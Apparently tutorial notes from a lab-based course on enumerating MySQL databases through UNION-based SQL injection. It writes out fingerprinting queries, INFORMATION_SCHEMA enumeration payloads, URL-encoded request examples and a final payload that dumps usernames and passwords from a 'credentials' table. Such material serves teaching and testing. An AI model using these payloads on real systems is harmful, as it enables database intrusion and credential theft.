The process of gathering information about the database using SQL queries within SQL injections
Involves identifying the DBMS type, available databases, tables, and columns
Crucial for properly forming SELECT queries to extract data
Prerequisites
Understanding of SQL queries in MySQL
Knowledge of SQL injection techniques
Access to a vulnerable web application with SQL injection flaws
MySQL Fingerprinting
Why is MySQL Fingerprinting Important?
Different DBMS have different queries and syntax
Identifying the DBMS helps in using the correct queries for enumeration
Narrows down the focus to MySQL-specific techniques
Initial Guesses Based on Web Server
Apache or Nginx web server suggests Linux OS and likely MySQL DBMS
Microsoft IIS web server suggests Microsoft OS and likely MSSQL DBMS
Not always accurate, as various databases can be used with any web server or OS
MySQL-Specific Fingerprinting Queries
| Query | When to Use | Expected Output | Wrong Output |
| SELECT @@version | Full query output available | MySQL version (e.g., 10.3.22-MariaDB-1ubuntu1) | Error or different DBMS version |
| SELECT POW(1,1) | Only numeric output | 1 | Error |
| SELECT SLEEP(5) | Blind/No output | Delays response by 5 seconds and returns 0 | No delay in response |
Example:
Trying
@@versionin the SQL injection payload returns "10.3.22-MariaDB-1ubuntu1"Confirms the DBMS is MariaDB, similar to MySQL
With direct query output, no need to test other payloads
INFORMATION_SCHEMA Database
What is the INFORMATION_SCHEMA Database?
Contains metadata about the databases and tables on the server
Crucial for exploiting SQL injection vulnerabilities
Allows retrieving information needed for forming SELECT queries
Required Information for SELECT Queries
List of databases
List of tables within each database
List of columns within each table
Referencing Tables in Different DatabasesExample:
SELECT * FROM my_database.users;INFORMATION_SCHEMA is a separate database
Tables cannot be directly called with SELECT statement
Use the dot '.' operator to reference tables in another database
SCHEMATA Table
Purpose of the SCHEMATA Table
Contains information about all databases on the server
Used to obtain database names for further enumeration
The
SCHEMA_NAMEcolumn holds the database names
Testing the Query Locally
Query:
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
Output:
Copy code+--------------------+
| SCHEMA_NAME |
+--------------------+
| mysql |
| information_schema |
| performance_schema |
| ilfreight |
| dev |
+--------------------+
Note: The first three databases are default MySQL databases and can be ignored during enumeration.
- Using UNION SQL Injection to Retrieve Database Names
Payload:
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
Example URL:
search.php?port_code=cn'+UNION+select+1%2Cschema_name%2C3%2C4+from+INFORMATION_SCHEMA.SCHEMATA--+-
Output:
- Apart from default databases, "ilfreight" and "dev" databases are discovered
Finding the Current Database
Useful to know which database the web application is using
Can be found using the
SELECT database()query
Payload:
cn' UNION select 1,database(),2,3-- -
Example URL:
http://SERVER_IP:PORT/search.php?port_code=cn'+UNION+select+1%2Cdatabase()%2C2%2C3--+-
Output:
Shows the current database is "ilfreight"
The "dev" database looks interesting for further enumeration
TABLES Table
Purpose of the TABLES Table
Contains information about all tables across the databases
Used to retrieve table names for querying with SELECT statements
The
TABLE_NAMEcolumn stores table namesThe
TABLE_SCHEMAcolumn indicates the database each table belongs to
Retrieving Tables within a Specific Database
Payload:
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
Note:
Replace column numbers '2' and '3' with 'TABLE_NAME' and 'TABLE_SCHEMA' to get both outputs
Add a condition
(where table_schema='dev')to filter tables only from the "dev" database
Example URL:
http://SERVER_IP:PORT/search.php?port_code=cn'+UNION+select+1%2CTABLE_NAME%2CTABLE_SCHEMA%2C4+from+INFORMATION_SCHEMA.TABLES+where+table_schema%3D'dev'--+-
Output:
Reveals four tables in the "dev" database: credentials, framework, pages, and posts
The "credentials" table could contain sensitive information worth investigating
COLUMNS Table
Purpose of the COLUMNS Table
Contains information about all columns present in the databases
Helps find column names to query a table
The
COLUMN_NAME,TABLE_NAME, andTABLE_SCHEMAcolumns are useful
Retrieving Column Names for a Specific Table
Payload:
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Example URL:
http://SERVER_IP:PORT/search.php?port_code=cn'+UNION+select+1%2CCOLUMN_NAME%2CTABLE_NAME%2CTABLE_SCHEMA+from+INFORMATION_SCHEMA.COLUMNS+where+table_name%3D'credentials'--+-
Output:
- Shows the "credentials" table has two columns: username and password
Extracting Data
Forming the UNION Query
With the database, table, and column information, a SELECT query can be formed
Place the desired column names in place of the corresponding column numbers
Payload:
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Note: Use the dot operator to refer to the "credentials" table in the "dev" database
Example URL:
http://SERVER_IP:PORT/search.php?port_code=cn'+UNION+select+1%2C+username%2C+password%2C+4+from+dev.credentials--+-
Output:
Retrieves all entries from the "credentials" table
Contains sensitive information like password hashes and an API key
Conclusion
Database enumeration is a crucial step in SQL injection exploitation
Involves identifying the DBMS, databases, tables, and columns
The INFORMATION_SCHEMA database provides metadata for forming SELECT queries
MySQL fingerprinting helps in using the correct syntax and queries
Retrieving data from specific tables requires knowing the database, table, and column names
Be cautious when dealing with sensitive information and ensure proper authorization